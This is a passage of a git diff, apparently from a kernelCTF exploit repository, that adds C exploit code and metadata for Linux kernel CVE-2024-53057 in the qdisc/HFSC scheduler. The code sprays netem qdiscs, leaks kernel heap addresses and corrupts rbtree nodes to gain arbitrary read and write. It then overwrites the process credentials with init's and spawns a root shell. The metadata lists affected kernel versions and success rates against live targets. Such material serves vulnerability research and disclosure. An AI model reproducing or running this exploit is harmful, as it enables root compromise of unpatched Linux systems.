Choose netem handles */ + for (int i = 0x10000000, j = 0; j < NETEM_SPRAY; i += 0x10000) { + if (QDISC_HASH(i) == spray_hash) + spray_handles[j++] = i; + } + + /* Wait for previously deleted qdiscs to be freed */ + printf("[*] Adding qdisc timer node %d\n", label); + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Destroy TBF qdisc */ + switch_ns(ns_inner); + tc_del_cl(tbfp); + switch_ns(ns_outer); + + /* Set timer on TBF qdisc */ + if (sendto(inet_sock_fd, &msgbuf, LABEL_TO_VALUE(label), 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); + + /* Wait for TBF qdisc to be freed */ + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Spray netem qdiscs */ + for (int i = 0; i < NETEM_SPRAY; i++) + b3 = tc_add_qd(&parms_netem_qdisc_msg, b3, spray_handles[i]); + + return 0; +} + +int main (int argc, char **argv) { + + if (argc > 1) { + clog_len = atoi(argv[1]); + } else { + clog_len = CLOG_LEN; + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + + for (int i = 0; i < 4; i++) { + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open socket to send netlink commands to */ + nl_socks[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_socks[i] == -1) + err_exit("[-] nl socket"); + + /* Set lo up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_socks[i], &if_up_msg); + + /* Open inet sockets */ + iaddr.sin_family = AF_INET; + iaddr.sin_port = htons(1); + iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + inet_socks[i] = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_socks[i] == -1) + err_exit("[-] inet socket"); + if (bind(inet_socks[i], &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] inet bind"); + } + + pin_cpu(0); + + /* Add timer nodes to tree */ + init_timers(); + add_neg_nodes(); + for (int i = 0; i < NUM_NODES - 2; i++) + add_timer_node(add_order[i]); + + /* Add dangling qdisc pointers to tree */ + int 
parent, n1, n2, netem_spray1[NETEM_SPRAY], netem_spray2[NETEM_SPRAY], enq_qd; + + switch_ns(1); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x150000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x1000000, netem_spray1, 1, add_order[NUM_NODES - 2], 1, 3)); + + switch_ns(2); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x20000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x2000000, netem_spray2, 2, add_order[NUM_NODES - 1], 2, 4)); + + /* Enqueue a packet at netem_spray[0] for later */ + switch_ns(2); + hfsc_qdisc_msg.def = 2; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x20000); + parent = tc_add_cl(&rsc_class_msg, 0x20000, 2); + enq_qd = tc_add_qd(&delay_netem_qdisc_msg, parent, 0x2a0000); + loopback_send(); + + + /* Leak heap addresses of attacker netem qdiscs by removing 15 */ + + long n1_base_kaddr, n1_parms_kaddr, n1_slot_kaddr, n2_base_kaddr, n2_parms_kaddr, n2_slot_kaddr; + long n1_parms_buf[7] = {}, n2_parms_buf[7] = {}; + long n1_slot_buf[5] = {}, n2_slot_buf[5] = {}; + + rm_timer_node(15); + + switch_ns(1); + n1 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray1[i], n1_parms_buf); + if (n1_parms_buf[0]) { + n1 = netem_spray1[i]; + break; + } + } + + switch_ns(2); + n2 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray2[i], n2_parms_buf); + if (n2_parms_buf[0]) { + n2 = netem_spray2[i]; + break; + } + } + if (n1 == -1 || n2 == -1) { + printf("[-] Heap address leak failed: n1 = %x, n2 = %x\n", n1, n2); + exit(EXIT_FAILURE); + } + + if (NETEM_SPRAY > 1) { + switch_ns(1); + tc_del_qd(n1); + switch_ns(2); + tc_del_qd(n2); + } + + + n2_parms_kaddr = n1_parms_buf[0]; + n2_base_kaddr = n2_parms_kaddr & ~1023; + n2_slot_kaddr = n2_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + n1_parms_kaddr = n2_parms_buf[2]; + n1_base_kaddr = n1_parms_kaddr & ~1023; + n1_slot_kaddr = 
n1_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + printf("[+] Found qdiscs: n1 handle = %x, n1 addr = %p\n" + " n2 handle = %x, n2 addr = %p\n", + n1, n1_base_kaddr, n2, n2_base_kaddr); + + + /* Overwrite n2->slot_dist by removing 13 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (s) (c) + \ + (c) + + y is at &n2->latency + */ + + n2_parms_buf[2] = n1_parms_kaddr + 32; // y->rb_left = s = &n1->latency + 32 + n1_parms_buf[5] = n2_base_kaddr + PRIVDATA_OFF + SLOT_DIST_OFF; // s->rb_right = &n2->slot_dist + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + + rm_timer_node(13); + + /* Overwrite n2->hash.next by removing 11 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->latency + 32 + */ + + n1_parms_buf[6] = n2_parms_kaddr + 32; // y->rb_left = p = &n2->latency + 32 + n2_parms_buf[6] = n1_slot_kaddr + 8; // p->rb_left = s = &n1->slot + 8 + n1_slot_buf[2] = n2_base_kaddr + 40; // s->rb_right = c = &n2->hash.next + n1_slot_buf[3] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + rm_timer_node(11); + + /* Set up arbitrary read */ + setup_stab_read(n2, n2_parms_kaddr, n2_slot_kaddr, 2); + + printf("[*] Arbitrary read set up\n"); + + /* Overwrite root qdisc's vt_tree by removing 9 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->slot + 8 + */ + + long root_qdisc_kaddr, netdevq_kaddr; + + netdevq_kaddr = stab_read_8(n1_base_kaddr + NETDEV_OFF); + root_qdisc_kaddr = stab_read_8(netdevq_kaddr + ROOT_QDISC_OFF); + + n1_slot_buf[3] = n1_parms_kaddr - 16; // y->rb_left = &n1->latency - 16 + n1_parms_buf[0] = n1_parms_kaddr + 32; // p->rb_left = &n1->latency + 32 + 
n1_parms_buf[5] = root_qdisc_kaddr + PRIVDATA_OFF + ROOT_OFF + + VT_TREE_OFF; // s->rb_right = &root_qdisc->privdata.root.vt_tree + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + + rm_timer_node(9); + + /* Set up vt_node write primitive */ + setup_vt_write(n1, n1_base_kaddr, 1); + + printf("[*] Write-what-where set up\n"); + + /* Set f_owner pointer in socket file */ + if (fcntl(inet_socks[1], F_SETOWN, getpid()) == -1) + err_exit("[-] fcntl"); + + /* Read kernel pointers */ + long task_kaddr, init_task_kaddr, init_cred_kaddr, init_fs_kaddr; + long next_addr; + + printf("[*] Getting kernel pointers\n"); + + netdevq_kaddr = stab_read_8(n2_base_kaddr + NETDEV_OFF); + next_addr = handle_to_kaddr(enq_qd, netdevq_kaddr); + + next_addr = stab_read_8(next_addr + PRIVDATA_OFF + T_HEAD_OFF); + next_addr = stab_read_8(next_addr + SK_OFF); + next_addr = stab_read_8(next_addr + SOCK_OFF); + next_addr = stab_read_8(next_addr + FILE_OFF); + next_addr = stab_read_8(next_addr + F_OWNER_OFF + PID_OFF); + next_addr = stab_read_8(next_addr + TASKS_OFF); + task_kaddr = next_addr -= PID_LINKS_OFF; + + do { + init_task_kaddr = next_addr; + next_addr = stab_read_8(next_addr + REAL_PARENT_OFF); + } while (next_addr != init_task_kaddr); + + init_cred_kaddr = stab_read_8(init_task_kaddr + CRED_OFF); + init_fs_kaddr = stab_read_8(init_task_kaddr + FS_OFF); + + printf("[+] task: %p, init_cred: %p, init_fs: %p\n", + task_kaddr, init_cred_kaddr, init_fs_kaddr); + + printf("[*] Overwriting cred and fs\n"); + + /* LPE */ + vt_write_8(task_kaddr + FS_OFF, init_fs_kaddr); + vt_write_8(task_kaddr + CRED_OFF, init_cred_kaddr); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[*] Launching shell\n"); + system("/bin/sh"); + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/metadata.json 
b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/metadata.json new file mode 100644 index 000000000..4176b99d6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/metadata.json @@ -0,0 +1,38 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp195" + ], + "vulnerability": { + "summary": "It is possible to create a non-ingress qdisc with handle TC_H_MAJ(TC_H_INGRESS). If a class belonging to a qdisc with this handle is deleted while a packet is enqueued at it, a dangling pointer will be left to it from the active list.", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2e95c4384438adeaa772caa560244b1a2efef816", + "cve": "CVE-2024-53057", + "affected_versions": [ + "2.6.25 - 6.11" + ], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NET_SCHED" + ] + } + }, + "exploits": { + "lts-6.6.52": { + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeds on 100% of tries against live instance" + }, + "cos-109-17800.309.59": { + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeds on 30% of tries against live instance" + }, + "mitigation-v3-6.1.55": { + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeds on 90% of tries against live instance" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/original.tar.gz new file mode 100644 index 000000000..b19c2b6c6 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/original.tar.gz differ